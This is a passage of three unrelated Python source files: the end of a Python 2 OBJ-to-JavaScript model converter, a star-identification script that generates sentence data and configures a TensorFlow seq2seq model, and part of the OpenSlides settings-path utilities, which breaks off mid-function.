    # 6. flat triangles uv (vertices + materials + uvs)
    # --------------------
    # a  unsigned int    4
    # b  unsigned int    4
    # c  unsigned int    4
    # --------------------
    # ua unsigned int    4
    # ub unsigned int    4
    # uc unsigned int    4
    # --------------------
    # m  unsigned short  2
    dump_vertices3_to_buffer(sfaces['triangles_flat_uv'], buffer)
    dump_uvs3_to_buffer(sfaces['triangles_flat_uv'], buffer)
    dump_materials_to_buffer(sfaces['triangles_flat_uv'], buffer)
    add_padding(buffer, ntri_flat_uv * 2)
    # 7. smooth triangles uv (vertices + materials + normals + uvs)
    # ----------------------
    # a  unsigned int    4
    # b  unsigned int    4
    # c  unsigned int    4
    # --------------------
    # na unsigned int    4
    # nb unsigned int    4
    # nc unsigned int    4
    # --------------------
    # ua unsigned int    4
    # ub unsigned int    4
    # uc unsigned int    4
    # --------------------
    # m  unsigned short  2
    dump_vertices3_to_buffer(sfaces['triangles_smooth_uv'], buffer)
    dump_normals3_to_buffer(sfaces['triangles_smooth_uv'], buffer)
    dump_uvs3_to_buffer(sfaces['triangles_smooth_uv'], buffer)
    dump_materials_to_buffer(sfaces['triangles_smooth_uv'], buffer)
    add_padding(buffer, ntri_smooth_uv * 2)
    # 8. flat quads (vertices + materials)
    # ------------------
    # a unsigned int   4
    # b unsigned int   4
    # c unsigned int   4
    # d unsigned int   4
    # --------------------
    # m unsigned short 2
    dump_vertices4_to_buffer(sfaces['quads_flat'], buffer)
    dump_materials_to_buffer(sfaces['quads_flat'], buffer)
    add_padding(buffer, nquad_flat * 2)
    # 9. smooth quads (vertices + materials + normals)
    # -------------------
    # a  unsigned int   4
    # b  unsigned int   4
    # c  unsigned int   4
    # d  unsigned int   4
    # --------------------
    # na unsigned int   4
    # nb unsigned int   4
    # nc unsigned int   4
    # nd unsigned int   4
    # --------------------
    # m  unsigned short 2
    dump_vertices4_to_buffer(sfaces['quads_smooth'], buffer)
    dump_normals4_to_buffer(sfaces['quads_smooth'], buffer)
    dump_materials_to_buffer(sfaces['quads_smooth'], buffer)
    add_padding(buffer, nquad_smooth * 2)
    # 10. flat quads uv (vertices + materials + uvs)
    # ------------------
    # a  unsigned int   4
    # b  unsigned int   4
    # c  unsigned int   4
    # d  unsigned int   4
    # --------------------
    # ua unsigned int   4
    # ub unsigned int   4
    # uc unsigned int   4
    # ud unsigned int   4
    # --------------------
    # m  unsigned short 2
    dump_vertices4_to_buffer(sfaces['quads_flat_uv'], buffer)
    dump_uvs4_to_buffer(sfaces['quads_flat_uv'], buffer)
    dump_materials_to_buffer(sfaces['quads_flat_uv'], buffer)
    add_padding(buffer, nquad_flat_uv * 2)
    # 11. smooth quads uv
    # -------------------
    # a  unsigned int   4
    # b  unsigned int   4
    # c  unsigned int   4
    # d  unsigned int   4
    # --------------------
    # na unsigned int   4
    # nb unsigned int   4
    # nc unsigned int   4
    # nd unsigned int   4
    # --------------------
    # ua unsigned int   4
    # ub unsigned int   4
    # uc unsigned int   4
    # ud unsigned int   4
    # --------------------
    # m  unsigned short 2
    dump_vertices4_to_buffer(sfaces['quads_smooth_uv'], buffer)
    dump_normals4_to_buffer(sfaces['quads_smooth_uv'], buffer)
    dump_uvs4_to_buffer(sfaces['quads_smooth_uv'], buffer)
    dump_materials_to_buffer(sfaces['quads_smooth_uv'], buffer)
    add_padding(buffer, nquad_smooth_uv * 2)
    path = os.path.dirname(outfile)
    fname = os.path.join(path, binfile)
    out = open(fname, "wb")
    out.write("".join(buffer))
    out.close()
# #############################################################################
# Helpers
# #############################################################################
def usage():
    # Print the command-line synopsis for this converter script.
    print "Usage: %s -i filename.obj -o filename.js [-m morphfiles*.obj] [-c morphcolors*.obj] [-a center|top|bottom] [-s flat|smooth] [-t binary|ascii] [-d invert|normal]" % os.path.basename(sys.argv[0])
# #####################################################
# Main
# #####################################################
if __name__ == "__main__":
    # get parameters from the command line
    # NOTE(review): 'b' appears twice in the short-option string ("hb..."
    # and later "b:"); getopt uses the first occurrence, so -b is a flag
    # (bakecolors) and the later "b:" spec is dead.
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hbi:m:c:b:o:a:s:t:d:x:f:", ["help", "bakecolors", "input=", "morphs=", "colors=", "output=", "align=", "shading=", "type=", "dissolve=", "truncatescale=", "framestep="])
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    infile = outfile = ""
    morphfiles = ""
    colorfiles = ""
    # options below rebind the module-level conversion settings
    # (ALIGN, SHADING, TYPE, TRANSPARENCY, BAKE_COLORS, TRUNCATE, SCALE,
    # FRAMESTEP) — presumably given defaults earlier in the file
    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
            sys.exit()
        elif o in ("-i", "--input"):
            infile = a
        elif o in ("-m", "--morphs"):
            morphfiles = a
        elif o in ("-c", "--colors"):
            colorfiles = a
        elif o in ("-o", "--output"):
            outfile = a
        elif o in ("-a", "--align"):
            if a in ("top", "bottom", "center", "centerxz", "none"):
                ALIGN = a
        elif o in ("-s", "--shading"):
            if a in ("flat", "smooth"):
                SHADING = a
        elif o in ("-t", "--type"):
            if a in ("binary", "ascii"):
                TYPE = a
        elif o in ("-d", "--dissolve"):
            if a in ("normal", "invert"):
                TRANSPARENCY = a
        elif o in ("-b", "--bakecolors"):
            BAKE_COLORS = True
        elif o in ("-x", "--truncatescale"):
            TRUNCATE = True
            SCALE = float(a)
        elif o in ("-f", "--framestep"):
            FRAMESTEP = int(a)
    # both an input and an output path are mandatory
    if infile == "" or outfile == "":
        usage()
        sys.exit(2)
    print "Converting [%s] into [%s] ..." % (infile, outfile)
    if morphfiles:
        print "Morphs [%s]" % morphfiles
    if colorfiles:
        print "Colors [%s]" % colorfiles
    if TYPE == "ascii":
        convert_ascii(infile, morphfiles, colorfiles, outfile)
    elif TYPE == "binary":
        convert_binary(infile, outfile)
| |
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import math, os
import libstarid
ls = libstarid.libstarid()  # project-local star catalog / image generator
ls.read_sky('../data/sky')  # load the sky catalog once at module import
dirdata = '../data/'  # base directory for generated data files
class Vocabulary:
    """Word-frequency tables for the two parallel sentence languages:
    geometry words (`geom`) and star-id words (`ids`), plus the number
    of unique sentences recorded per star (`starndxs`)."""

    def __init__(self):
        self.starndxs = []
        self.geom = {}
        self.ids = {}
        # special tokens get a large fixed count so they survive any
        # frequency-based pruning downstream
        for token in ('<unk>', '<s>', '</s>'):
            self.geom[token] = 1000
            self.ids[token] = 1000

    def update(self, sentences, starndx):
        """Fold one star's generated sentences into the word counts.

        sentences maps a key to a tuple whose [1] element is the
        space-separated geometry sentence and [2] the id sentence.
        """
        # record how many unique sentences this star produced
        self.starndxs.append([starndx, len(sentences)])
        for value in sentences.values():
            for word in value[1].split(' '):
                self.geom[word] = self.geom.get(word, 0) + 1
            for word in value[2].split(' '):
                self.ids[word] = self.ids.get(word, 0) + 1

    def write_files(self, path):
        """Write one word per line to <path>vocab.geom and <path>vocab.ids."""
        with open(path + 'vocab.geom', 'w') as fout:
            for word in self.geom:
                fout.write('%s\n' % word)
        with open(path + 'vocab.ids', 'w') as fout:
            for word in self.ids:
                fout.write('%s\n' % word)
def diststr(x):
    """Quantize distance x into 0.1-wide bins and return the bin index
    (the ceiling of x / 0.1) as a string."""
    bucket = math.ceil(x / .1)
    return str(bucket)
class Starimg:
    """28x28 binary star image for one target star, plus the derived
    radius-sorted star list and, when at least six stars are present,
    its Lang1 sentence representation (otherwise self.lang is None).

    NOTE(review): `info` is indexed as info[rowndx, 0] so it is assumed
    to be a numpy array whose rows are [pixel_row, pixel_col, starndx] —
    confirm against ls.image_generator's output.
    """
    def __init__(self, starndx, info):
        self.starndx = starndx # starndx of target star
        self.info = info
        # use info to generate a 28 by 28 image pixel matrix
        self.image = np.zeros((28,28))
        for rowndx in range(len(self.info)):
            self.image[int(self.info[rowndx, 0]), int(self.info[rowndx, 1])] = 1.0
        # starlist is for info ready for writing nouns, verbs, and sentences
        self.starlist = []
        # self.starlist.append([int(self.starndx), 0., 0., 0.])
        # todo check pixels are unique within starlist
        for row in self.info:
            starndx = int(row[2])
            # pixel coordinates recentered on the image middle (13.5, 13.5)
            x = row[1] - 13.5
            y = 13.5 - row[0]
            # radius from center, rounded up to 2 decimals
            r = math.ceil(math.sqrt(x**2 + y**2) * 100.) / 100.
            self.starlist.append([starndx, int(row[0]), int(row[1]), x, y, r])
        self.starlist = sorted(self.starlist, key=lambda x: x[5]) # sorted(self.starlist, key = lambda x: (x[3], x[0])
        if len(self.starlist) < 6: # too few stars
            self.lang = None
            return
        self.lang = Lang1(self.starlist, self.starndx)
    def plot_image(self):
        # show the binary image inverted (stars dark on light background)
        plt.matshow(-1 * self.image, cmap='Greys', interpolation='nearest')
        plt.show()
    def print_starlist(self):
        # debug dump of the derived star list
        import pprint
        pprint.pprint(self.starlist)
class Lang1:
    """Two parallel sentences describing the six nearest stars: a
    geometry sentence (quantized triangle sides / distances) and an id
    sentence (star indices), built from two three-star nouns and two
    verbs relating them.
    """
    def __init__(self, starlist, starndx):
        # noun0 carries the target star: geometry side is a placeholder
        self.noun0g = 'n:na'
        self.noun0i = 'n:' + str(starndx)
        # noun1: three innermost stars; noun2: next three
        self.noun1 = self.Noun(starlist[0:3])
        self.noun2 = self.Noun(starlist[3:6])
        # verb1 relates noun1 to the image center (nounb omitted -> origin)
        self.verb1 = self.Verb(self.noun1)
        self.verb2 = self.Verb(self.noun1, self.noun2)
        self.sentence_geom = self.noun1.geom + ' ' + self.verb1.geom + ' ' + self.noun0g + ' , ' \
                             + self.verb2.geom + ' ' + self.noun2.geom + ' .'
        self.sentence_ids = self.noun1.ids + ' ' + self.verb1.ids + ' ' + self.noun0i + ' , ' \
                            + self.verb2.ids + ' ' + self.noun2.ids + ' .'
    class Verb:
        """Quantized distances between corresponding side endpoints of two
        nouns (or between nouna and the origin when nounb is omitted)."""
        def __init__(self, nouna, nounb=None):
            # endpoint coordinates of nouna's three (sorted) sides
            xa = [nouna.sides[0][5], nouna.sides[1][5], nouna.sides[2][5]]
            ya = [nouna.sides[0][6], nouna.sides[1][6], nouna.sides[2][6]]
            xb = [0., 0., 0.]
            yb = [0., 0., 0.]
            if nounb:
                xb = [nounb.sides[0][5], nounb.sides[1][5], nounb.sides[2][5]]
                yb = [nounb.sides[0][6], nounb.sides[1][6], nounb.sides[2][6]]
            d0 = math.sqrt((xa[0] - xb[0]) ** 2 + (ya[0] - yb[0]) ** 2)
            d1 = math.sqrt((xa[1] - xb[1]) ** 2 + (ya[1] - yb[1]) ** 2)
            d2 = math.sqrt((xa[2] - xb[2]) ** 2 + (ya[2] - yb[2]) ** 2)
            # verbs read the same in both languages
            self.geom = 'v:' + diststr(d0) + ':' + diststr(d1) + ':' + diststr(d2)
            self.ids = self.geom
    class Noun:
        """Triangle formed by three stars: `geom` encodes the quantized
        side lengths (shortest first), `ids` the star indices ordered to
        match that side ordering."""
        def __init__(self, stars):
            self.stars = stars # star input for just this noun, three stars
            id = [self.stars[0][0], self.stars[1][0], self.stars[2][0]]
            x = [self.stars[0][3], self.stars[1][3], self.stars[2][3]]
            y = [self.stars[0][4], self.stars[1][4], self.stars[2][4]]
            side01 = math.sqrt((x[0] - x[1])**2 + (y[0] - y[1])**2)
            side12 = math.sqrt((x[1] - x[2])**2 + (y[1] - y[2])**2)
            side20 = math.sqrt((x[2] - x[0])**2 + (y[2] - y[0])**2)
            # each row: [from, to, id_from, id_to, length, x_from, y_from, x_to, y_to]
            sides = [
                [0, 1, id[0], id[1], side01, x[0], y[0], x[1], y[1]],
                [1, 2, id[1], id[2], side12, x[1], y[1], x[2], y[2]],
                [2, 0, id[2], id[0], side20, x[2], y[2], x[0], y[0]]]
            sides = sorted(sides, key=lambda side: (side[4], side[0])) # increasing side length
            sideab = sides[0][4]
            sidebc = sides[1][4]
            sideca = sides[2][4]
            # pick a consistent a/b/c star labeling depending on whether the
            # two shortest sides follow the original cyclic orientation
            if (sides[0][0] == 0 and sides[1][0] == 1) \
                    or (sides[0][0] == 1 and sides[1][0] == 2) \
                    or (sides[0][0] == 2 and sides[1][0] == 0):
                stara = str(sides[0][2])
                starb = str(sides[0][3])
                starc = str(sides[1][3])
            else:
                stara = str(sides[0][3])
                starb = str(sides[0][2])
                starc = str(sides[1][2])
            self.sides = sides
            self.geom = 'n:' + diststr(sideab) + ':' + diststr(sidebc) + ':' + diststr(sideca)
            self.ids = 'n:' + stara + ':' + starb + ':' + starc
def generate_sentences_for_star(starndx, numsentences, verbose=False):
    """Sample `numsentences` images of star `starndx` and tally the distinct
    sentences they produce.

    Returns a dict mapping "geom : ids" keys to [count, geom, ids] entries.
    """
    tally = {}
    for _ in range(numsentences):
        generated = ls.image_generator(starndx)
        img = Starimg(starndx=starndx, info=generated['info'])
        lang = img.lang
        if not lang:
            # Image held fewer than six stars; no sentence could be built.
            continue
        key = lang.sentence_geom + ' : ' + lang.sentence_ids
        entry = tally.get(key)
        if entry is None:
            tally[key] = [1, lang.sentence_geom, lang.sentence_ids]
        else:
            entry[0] += 1
    if verbose:
        print(sorted(tally.values(), key=lambda x: -x[0]))
    return tally
def create_vocabulary_files(path):
    """Build vocabulary files (vocab.geom / vocab.ids) under `path`.

    Samples 1000 sentences for each of the 11 target stars and writes the
    accumulated geometry and id vocabularies.
    """
    vocabulary = Vocabulary()
    for starndx in range(11):  # starndx 4 has less than six stars, so include starndx 10
        sentences = generate_sentences_for_star(starndx=starndx, numsentences=1000)
        vocabulary.update(sentences=sentences, starndx=starndx)
    print(vocabulary.starndxs)  # sentences per starndx
    # Bug fix: previously wrote to the global `dirdata` regardless of the
    # `path` argument; honor the caller-supplied path instead.
    vocabulary.write_files(path=path)
def create_sentence_files(path, prefix, sentences_per_itr, numitrs):
    """Write parallel sentence files `<prefix>.geom` / `<prefix>.ids` under `path`.

    Each iteration samples `sentences_per_itr` sentences for every target star
    and appends the geometry and id renderings line by line.
    """
    # Use context managers so the files are closed even if sentence
    # generation raises (the originals leaked on exception).
    with open(path + prefix + '.geom', 'w') as fgeom, \
            open(path + prefix + '.ids', 'w') as fids:
        for itr in range(numitrs):
            for starndx in range(11):  # starndx 4 has less than six stars, so include starndx 10
                sentences = generate_sentences_for_star(starndx=starndx, numsentences=sentences_per_itr)
                for value in sentences.values():
                    fgeom.write('%s\n' % value[1])
                    fids.write('%s\n' % value[2])
from nmt import model as nmt_model
from nmt import model_helper
from nmt import train
from nmt import inference
from nmt.utils import misc_utils as utils
from nmt.utils import vocab_utils
# NOTE(review): `global` at module scope is a no-op; `hparams` is already a
# module-level name.
global hparams
dirdata = '../data/'
# Hyperparameters for the nmt seq2seq model: translate geometry tokens
# (source) into star-id tokens (target).
hparams = tf.contrib.training.HParams(
    src='geom',
    tgt='ids',
    dev_prefix=dirdata+'test1',
    test_prefix=dirdata+'test2',
    vocab_prefix=dirdata+'vocab',
    train_prefix=dirdata+'train',
    out_dir=dirdata+'nmt_model',
    num_units=128,
    num_layers=2,
    dropout=0.2,
    unit_type='lstm',
    encoder_type='uni',
    residual=False,
    num_residual_layers=0,
    time_major=True,
    num_embeddings_partitions=0,
    attention='',
    attention_architecture='standard',
    pass_hidden_state=True,
    optimizer='sgd',
    num_train_steps=100,
    batch_size=128,
    init_op='uniform',
    init_weight=0.1,
    max_gradient_norm=5.0,
    learning_rate=1.0,
    warmup_steps=0,
    warmup_scheme='t2t',
    start_decay_step=0,
    decay_factor=1.0,
    decay_steps=10000,
    learning_rate_decay_scheme='',
    colocate_gradients_with_ops=True,
    num_buckets=5,
    max_train=0,
    src_max_len=50,
    tgt_max_len=50,
    src_max_len_infer=False,
    tgt_max_len_infer=False,
    source_reverse=True,
    infer_batch_size=32,
    beam_width=0,
    length_penalty_weight=0.0,
    num_translations_per_input=1,
    sos='<s>',
    eos='</s>',
    subword_option='',
    check_special_token=True,
    share_vocab=False,
    forget_bias=1.0,
    num_gpus=1,
    epoch_step=0,
    steps_per_stats=100,
    steps_per_external_eval=None,
    metrics=['bleu'],
    log_device_placement=False,
    random_seed=None,
    override_loaded_hparams=False,
    use_char_encode=False,
    num_sampled_softmax=0,
    num_encoder_layers=4,
    num_decoder_layers=4,
    num_enc_emb_partitions=0,
    num_dec_emb_partitions=0,
    src_embed_file=None,
    tgt_embed_file=None,
    language_model=False,
    decay_scheme=None,
    num_keep_ckpts=0,
    )
# Validate the two vocabulary files and let nmt prepend the special tokens
# (<s>, </s>, <unk>) if they are missing; the returned paths may point at
# rewritten copies under out_dir.
src_vocab_file = hparams.vocab_prefix + '.' + hparams.src
tgt_vocab_file = hparams.vocab_prefix + '.' + hparams.tgt
src_vocab_size, src_vocab_file = vocab_utils.check_vocab(
    src_vocab_file,
    hparams.out_dir,
    check_special_token=hparams.check_special_token,
    sos=hparams.sos,
    eos=hparams.eos,
    unk=vocab_utils.UNK)
tgt_vocab_size, tgt_vocab_file = vocab_utils.check_vocab(
    tgt_vocab_file,
    hparams.out_dir,
    check_special_token=hparams.check_special_token,
    sos=hparams.sos,
    eos=hparams.eos,
    unk=vocab_utils.UNK)
hparams.add_hparam("src_vocab_size", src_vocab_size)
hparams.add_hparam("tgt_vocab_size", tgt_vocab_size)
hparams.add_hparam("src_vocab_file", src_vocab_file)
hparams.add_hparam("tgt_vocab_file", tgt_vocab_file)
def train_minimalist():
    """Minimal training loop over the nmt model: load/create a checkpoint,
    run `num_train_steps` training steps (re-initializing the iterator on
    epoch end), then save a final checkpoint."""
    model_creator = nmt_model.Model
    train_model = model_helper.create_train_model(model_creator, hparams)
    train_sess = tf.Session(config=utils.get_config_proto(log_device_placement=hparams.log_device_placement), graph=train_model.graph)
    with train_model.graph.as_default():
        loaded_train_model, global_step = model_helper.create_or_load_model(train_model.model, hparams.out_dir, train_sess, 'train')
    summary_writer = tf.summary.FileWriter(os.path.join(hparams.out_dir, 'train_log'), train_model.graph)
    # Skip over batches already consumed in a partially-finished epoch.
    train_sess.run(train_model.iterator.initializer, feed_dict={train_model.skip_count_placeholder: (hparams.batch_size * hparams.epoch_step)})
    # NOTE(review): the checkpoint's global_step is discarded here and a
    # local step counter is used instead — confirm this is intentional.
    global_step = 0
    while global_step < hparams.num_train_steps:
        try:
            #(_, step_loss, step_predict_count, step_summary, global_step, step_word_count, batch_size) = loaded_train_model.train(train_sess)
            output = loaded_train_model.train(train_sess)
            global_step += 1
        except tf.errors.OutOfRangeError:
            # Data exhausted: start the next epoch from the beginning.
            utils.print_out('# epoch completed, step %d' % global_step)
            train_sess.run(train_model.iterator.initializer, feed_dict={train_model.skip_count_placeholder: 0})
            continue
        #summary_writer.add_summary(step_summary, global_step)
    loaded_train_model.saver.save(train_sess, os.path.join(hparams.out_dir, 'checkpoint.ckpt'), global_step=global_step)
    summary_writer.close()
def eval_minimalist():
    """Training loop with internal (perplexity) evaluation before and during
    training, then a final checkpoint save."""
    model_creator = nmt_model.Model
    train_model = model_helper.create_train_model(model_creator, hparams)
    eval_model = model_helper.create_eval_model(model_creator, hparams)
    train_sess = tf.Session(config=utils.get_config_proto(log_device_placement=hparams.log_device_placement), graph=train_model.graph)
    eval_sess = tf.Session(config=utils.get_config_proto(log_device_placement=hparams.log_device_placement), graph=eval_model.graph)
    with train_model.graph.as_default():
        loaded_train_model, global_step = model_helper.create_or_load_model(train_model.model, hparams.out_dir, train_sess, 'train')
    summary_writer = tf.summary.FileWriter(os.path.join(hparams.out_dir, 'train_log'), train_model.graph)
    train_sess.run(train_model.iterator.initializer, feed_dict={train_model.skip_count_placeholder: (hparams.batch_size * hparams.epoch_step)})
    # Baseline eval before any training steps.
    train.run_internal_eval(eval_model, eval_sess, hparams.out_dir, hparams, summary_writer)
    global_step = 0
    while global_step < hparams.num_train_steps:
        try:
            # NOTE(review): global_step is both unpacked from train() and then
            # incremented — confirm which counter is authoritative.
            (_, step_loss, step_predict_count, step_summary, global_step, step_word_count, batch_size) = loaded_train_model.train(train_sess)
            global_step += 1
        except tf.errors.OutOfRangeError:
            utils.print_out('# epoch completed, step %d' % global_step)
            train_sess.run(train_model.iterator.initializer, feed_dict={train_model.skip_count_placeholder: 0})
            continue
        # NOTE(review): if the first train() call raises OutOfRangeError,
        # step_summary below would be unbound on a later iteration path —
        # verify the iterator always yields at least one batch.
        train.run_internal_eval(eval_model, eval_sess, hparams.out_dir, hparams, summary_writer)
        summary_writer.add_summary(step_summary, global_step)
    loaded_train_model.saver.save(train_sess, os.path.join(hparams.out_dir, 'checkpoint.ckpt'), global_step=global_step)
    summary_writer.close()
def infer_minimalist():
    """Run sample decoding and external (BLEU) evaluation on the dev set
    using the latest checkpoint in `hparams.out_dir`."""
    model_creator = nmt_model.Model
    infer_model = model_helper.create_infer_model(model_creator, hparams)
    dev_src_file = "%s.%s" % (hparams.dev_prefix, hparams.src)
    dev_tgt_file = "%s.%s" % (hparams.dev_prefix, hparams.tgt)
    sample_src_data = inference.load_data(dev_src_file)
    sample_tgt_data = inference.load_data(dev_tgt_file)
    infer_sess = tf.Session(config=utils.get_config_proto(log_device_placement=hparams.log_device_placement), graph=infer_model.graph)
    with infer_model.graph.as_default():
        loaded_infer_model, global_step = model_helper.create_or_load_model(infer_model.model, hparams.out_dir, infer_sess, 'infer')
    infer_sess.run(infer_model.iterator.initializer, feed_dict={infer_model.src_placeholder: sample_src_data, infer_model.batch_size_placeholder: hparams.infer_batch_size})
    summary_writer = tf.summary.FileWriter(os.path.join(hparams.out_dir, 'infer_log'), infer_model.graph)
    train.run_sample_decode(infer_model, infer_sess, hparams.out_dir, hparams, summary_writer, sample_src_data, sample_tgt_data)
    train.run_external_eval(infer_model, infer_sess, hparams.out_dir, hparams, summary_writer)
    summary_writer.close()
if __name__ == '__main__':
    # Ensure the data directory exists, then (re)generate the vocabulary and
    # the train/dev/test sentence corpora.
    if not tf.gfile.Exists(dirdata): tf.gfile.MakeDirs(dirdata)
    create_vocabulary_files(dirdata)
    create_sentence_files(path=dirdata, prefix='train', sentences_per_itr=100, numitrs=10)
    create_sentence_files(path=dirdata, prefix='test1', sentences_per_itr=100, numitrs=10)
    create_sentence_files(path=dirdata, prefix='test2', sentences_per_itr=100, numitrs=10)
    if not tf.gfile.Exists(hparams.out_dir): tf.gfile.MakeDirs(hparams.out_dir)
    # Training / evaluation / inference entry points, disabled by default:
    #train_minimalist()
    # eval_minimalist()
    # infer_minimalist()
| |
import argparse
import ctypes
import os
import sys
import tempfile
import threading
import time
import webbrowser
from typing import Dict, Optional
from django.conf import ENVIRONMENT_VARIABLE
from django.core.exceptions import ImproperlyConfigured
from django.utils.crypto import get_random_string
from mypy_extensions import NoReturn
# Labels identifying how this OpenSlides instance is installed/run; used by
# detect_openslides_type() and the path helpers below.
DEVELOPMENT_VERSION = "Development Version"
UNIX_VERSION = "Unix Version"
WINDOWS_VERSION = "Windows Version"
WINDOWS_PORTABLE_VERSION = "Windows Portable Version"
class PortableDirNotWritable(Exception):
    """Raised when the Windows portable directory cannot be written to."""
    pass


class PortIsBlockedError(Exception):
    """Raised when the requested server port is already in use."""
    pass


class DatabaseInSettingsError(Exception):
    """Raised when the default database is missing or misconfigured."""
    pass


class UnknownCommand(Exception):
    """Raised on argument-parsing errors instead of exiting the process."""
    pass
class ExceptionArgumentParser(argparse.ArgumentParser):
    """ArgumentParser that raises :class:`UnknownCommand` instead of
    printing usage and exiting on a parse error."""

    def error(self, message: str) -> NoReturn:
        # argparse would normally call sys.exit(2) here; raise instead so
        # callers can handle the failure programmatically.
        raise UnknownCommand(message)
def detect_openslides_type() -> str:
    """
    Returns the type of this OpenSlides version.
    """
    if sys.platform != "win32":
        return UNIX_VERSION
    # The portable build embeds Python, so sys.executable *is* the
    # openslides.exe wrapper itself.  pip-generated wrappers spawn the usual
    # python(w).exe, so they cannot be mistaken for the portable version even
    # if also named openslides.exe.
    executable_name = os.path.basename(sys.executable).lower()
    if executable_name == "openslides.exe":
        return WINDOWS_PORTABLE_VERSION
    return WINDOWS_VERSION
def get_default_settings_dir(openslides_type: str = None) -> str:
    """
    Returns the default settings path according to the OpenSlides type.

    The argument 'openslides_type' has to be one of the three types mentioned in
    openslides.utils.main.
    """
    if openslides_type is None:
        openslides_type = detect_openslides_type()

    if openslides_type == UNIX_VERSION:
        # Honour the XDG base-directory convention on Unix.
        base_dir = os.environ.get("XDG_CONFIG_HOME", os.path.expanduser("~/.config"))
    elif openslides_type == WINDOWS_VERSION:
        base_dir = get_win32_app_data_dir()
    elif openslides_type == WINDOWS_PORTABLE_VERSION:
        base_dir = get_win32_portable_dir()
    else:
        raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")

    return os.path.join(base_dir, "openslides")
def get_local_settings_dir() -> str:
    """
    Returns the path to a local settings.

    On Unix systems: 'personal_data/var/'
    """
    path_parts = ("personal_data", "var")
    return os.path.join(*path_parts)
def setup_django_settings_module(
    settings_path: str = None, local_installation: bool = False
) -> None:
    """
    Sets the environment variable ENVIRONMENT_VARIABLE, that means
    'DJANGO_SETTINGS_MODULE', to the given settings.

    If no settings_path is given and the environment variable is already set,
    then this function does nothing.

    If the argument settings_path is set, then the environment variable is
    always overwritten.
    """
    if settings_path is None and os.environ.get(ENVIRONMENT_VARIABLE, ""):
        # Nothing to do: caller supplied no path and Django is already configured.
        return

    if settings_path is None:
        if local_installation:
            settings_dir = get_local_settings_dir()
        else:
            settings_dir = get_default_settings_dir()
        settings_path = os.path.join(settings_dir, "settings.py")

    # Django expects a dotted module name, so strip the ".py" extension.
    settings_file = os.path.basename(settings_path)
    settings_module_name = ".".join(settings_file.split(".")[:-1])
    if "." in settings_module_name:
        # A dot would make the module name un-importable as a single module.
        raise ImproperlyConfigured(
            "'.' is not an allowed character in the settings-file"
        )

    # Change the python path. Also set the environment variable python path, so
    # change of the python path also works after a reload
    settings_module_dir = os.path.abspath(os.path.dirname(settings_path))
    sys.path.insert(0, settings_module_dir)
    try:
        os.environ["PYTHONPATH"] = os.pathsep.join(
            (settings_module_dir, os.environ["PYTHONPATH"])
        )
    except KeyError:
        # The environment variable is empty
        os.environ["PYTHONPATH"] = settings_module_dir

    # Set the environment variable to the settings module
    os.environ[ENVIRONMENT_VARIABLE] = settings_module_name
def get_default_settings_context(user_data_dir: str = None) -> Dict[str, str]:
    """
    Returns the default context values for the settings template:
    'openslides_user_data_path', 'import_function' and 'debug'.

    The argument 'user_data_path' is a given path for user specific data or None.
    """
    # Setup path for user specific data (SQLite3 database, media, ...):
    # Take it either from command line or get default path
    context = {}
    if user_data_dir:
        context["openslides_user_data_dir"] = repr(user_data_dir)
        context["import_function"] = ""
    else:
        openslides_type = detect_openslides_type()
        if openslides_type == WINDOWS_PORTABLE_VERSION:
            # The portable version resolves its data directory at runtime, so
            # the template gets a function call plus the matching import line.
            context["openslides_user_data_dir"] = "get_win32_portable_user_data_dir()"
            context["import_function"] = (
                "from openslides.utils.main import get_win32_portable_user_data_dir"
            )
        else:
            data_dir = get_default_user_data_dir(openslides_type)
            context["openslides_user_data_dir"] = repr(
                os.path.join(data_dir, "openslides")
            )
            context["import_function"] = ""
    context["debug"] = "False"
    return context
def get_default_user_data_dir(openslides_type: str) -> str:
    """
    Returns the default directory for user specific data according to the OpenSlides
    type.

    The argument 'openslides_type' has to be one of the three types mentioned
    in openslides.utils.main.
    """
    if openslides_type == UNIX_VERSION:
        # Honour the XDG base-directory convention on Unix.
        return os.environ.get("XDG_DATA_HOME", os.path.expanduser("~/.local/share"))
    if openslides_type == WINDOWS_VERSION:
        return get_win32_app_data_dir()
    if openslides_type == WINDOWS_PORTABLE_VERSION:
        return get_win32_portable_dir()
    raise TypeError(f"{openslides_type} is not a valid OpenSlides type.")
def get_win32_app_data_dir() -> str:
    """
    Returns the directory of Windows' AppData directory.
    """
    shell32 = ctypes.WinDLL("shell32.dll")  # type: ignore
    SHGetFolderPath = shell32.SHGetFolderPathW
    # Declare the Win32 signature explicitly so ctypes marshals the
    # arguments and return value correctly.
    SHGetFolderPath.argtypes = (
        ctypes.c_void_p,
        ctypes.c_int,
        ctypes.c_void_p,
        ctypes.c_uint32,
        ctypes.c_wchar_p,
    )
    SHGetFolderPath.restype = ctypes.c_uint32

    CSIDL_LOCAL_APPDATA = 0x001C
    MAX_PATH = 260

    buf = ctypes.create_unicode_buffer(MAX_PATH)
    # A non-zero result is a failure HRESULT from the shell API.
    res = SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, 0, buf)
    if res != 0:
        # TODO: Write other exception
        raise Exception("Could not determine Windows' APPDATA path")

    return buf.value  # type: ignore
def get_win32_portable_dir() -> str:
    """
    Returns the directory of the Windows portable version.

    Raises PortableDirNotWritable if the directory cannot be written to.
    """
    # sys.executable is openslides.exe itself (the portable build embeds the
    # interpreter), so its directory is the portable root.
    portable_dir = os.path.dirname(os.path.abspath(sys.executable))
    try:
        handle, probe_path = tempfile.mkstemp(dir=portable_dir)
    except OSError:
        raise PortableDirNotWritable(
            "Portable directory is not writeable. "
            "Please choose another directory for settings and data files."
        )
    # Writability confirmed; remove the probe file again.
    os.close(handle)
    os.unlink(probe_path)
    return portable_dir
def get_win32_portable_user_data_dir() -> str:
    """
    Returns the user data directory to the Windows portable version.
    """
    portable_dir = get_win32_portable_dir()
    return os.path.join(portable_dir, "openslides")
def write_settings(
    settings_dir: str = None,
    settings_filename: str = "settings.py",
    template: str = None,
    **context: str,
) -> str:
    """
    Creates the settings file at the given dir using the given values for the
    file template.

    Returns the path to the created settings.
    """
    if settings_dir is None:
        settings_dir = get_default_settings_dir()
    settings_path = os.path.join(settings_dir, settings_filename)
    if template is None:
        # Default template ships next to this module.
        with open(
            os.path.join(os.path.dirname(__file__), "settings.py.tpl")
        ) as template_file:
            template = template_file.read()

    # Create a random SECRET_KEY to put it in the settings.
    # from django.core.management.commands.startproject
